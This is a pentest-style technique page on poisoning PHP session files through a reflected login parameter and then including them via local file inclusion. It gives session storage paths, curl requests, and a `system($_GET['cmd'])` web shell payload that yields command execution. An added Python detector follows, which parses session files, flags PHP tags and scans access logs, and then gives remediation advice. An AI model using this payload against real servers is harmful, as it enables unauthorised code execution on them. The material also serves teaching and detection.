Theory
If the website uses PHP sessions (PHPSESSID), we may poison the session file through a reflected parameter and include it through the LFI.
Practice
First, find where the session files are stored, for example:
# Linux
/var/lib/php5/sess_[PHPSESSID]
/var/lib/php/sessions/sess_[PHPSESSID]
# Windows
C:\Windows\Temp\sess_[PHPSESSID]
Second, display a session file through the LFI to see whether any parameter is reflected inside:
curl $URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
In this case, the reflected parameter is user, so we can inject some PHP code into the session through it.
# Log in with the reflected parameter (user) set to <?php system($_GET['cmd']);?>
login=1&user=<?php system($_GET['cmd']);?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file and pass the command in the cmd parameter (the second parameter is joined with &, not ?, and the URL is quoted so the shell does not interpret the &):
curl "$URL/?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27&cmd=id"
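Detection logic for the technique above, as an added example that is not part of the original page: a parser for the PHP session serialization format shown in the session dump (the default php serialize handler, name|value; records), a scanner that flags session values containing a PHP open tag (falling back to a raw scan when a file is malformed, as a poisoned or truncated file often is), and a check over web-server access-log lines for include parameters that point at the session storage paths listed above. The session contents, log lines and the PHPSESSID-bearing request are constructed samples; function names are this example's own.

```python
"""Detect PHP session poisoning: parse session files, flag values carrying PHP
code, and flag requests that try to include a session file through an LFI.
Added example; not part of the original page. All sample data is constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Session storage locations listed on the page (Windows path normalised to '/').
SESSION_DIRS = ("/var/lib/php5/sess_", "/var/lib/php/sessions/sess_",
                "c:/windows/temp/sess_")
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+"')


def _parse_value(data: bytes, pos: int):
    """Parse one PHP serialize() value at pos; return (value, next_pos).
    String lengths count bytes, so the parser works on bytes."""
    t = data[pos:pos + 1]
    if t == b"N":                                   # N;
        return None, pos + 2
    if t in (b"i", b"b", b"d"):                     # i:1;  b:0;  d:1.5;
        end = data.index(b";", pos)
        num = data[pos + 2:end].decode()
        val = float(num) if t == b"d" else int(num)
        return (bool(val) if t == b"b" else val), end + 1
    if t == b"s":                                   # s:5:"hello";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                           # skip ':"'
        val = data[start:start + length].decode("utf-8", "replace")
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("malformed string at offset %d" % pos)
        return val, start + length + 2
    if t == b"a":                                   # a:1:{key;value;}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                             # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = _parse_value(data, pos)
            result[key], pos = _parse_value(data, pos)
        return result, pos + 1                      # skip '}'
    raise ValueError("unsupported type %r at offset %d" % (t, pos))


def parse_php_session(data: bytes) -> dict:
    """Parse the name|value records of a PHP session file into a dict."""
    session, pos = {}, 0
    while pos < len(data):
        bar = data.index(b"|", pos)
        name = data[pos:bar].decode("utf-8", "replace")
        session[name], pos = _parse_value(data, bar + 1)
    return session


def find_poisoned_values(data: bytes) -> list:
    """Return (name, value) pairs whose value contains a PHP open tag.
    A file that does not parse is scanned raw instead of being skipped."""
    try:
        session = parse_php_session(data)
    except (ValueError, IndexError):
        text = data.decode("utf-8", "replace")
        return [("<unparsed>", text)] if PHP_TAG.search(text) else []
    hits = []

    def walk(name, value):
        if isinstance(value, str) and PHP_TAG.search(value):
            hits.append((name, value))
        elif isinstance(value, dict):
            for k, v in value.items():
                walk("%s[%s]" % (name, k), v)
    for name, value in session.items():
        walk(name, value)
    return hits


def is_session_include_attempt(target: str) -> bool:
    """True if any query parameter (after URL decoding) points into session storage."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for values in query.values():
        for v in values:
            v = v.replace("\\", "/").lower()
            if any(d in v for d in SESSION_DIRS):
                return True
    return False


def scan_access_log(lines) -> list:
    """Return the common-log-format lines whose request targets a session file."""
    flagged = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_session_include_attempt(m.group(2)):
            flagged.append(line)
    return flagged


# Constructed samples (not captured data).
CLEAN_SESSION = b'user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";user|s:5:"admin";'
POISONED_SESSION = (b'loggedin|s:1:"1";prefs|a:1:{s:5:"theme";s:4:"dark";}'
                    b'user|s:16:"<?php echo 1; ?>";')
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?file=about.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?file=/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27&cmd=id HTTP/1.1" 200 84',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?file=..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_abc HTTP/1.1" 200 84',
]

if __name__ == "__main__":
    print(find_poisoned_values(POISONED_SESSION))
    for line in scan_access_log(LOG_LINES):
        print("session include attempt:", line)
```

The log check decodes the query before matching, so percent-encoded and traversal-prefixed paths are caught as well as the literal form shown above. The scanner is a detection control only: the root cause is the include of a user-controlled path, and the fix is to never pass request input to include (resolve the file from an allowlist of known names) and to keep session storage outside the web root.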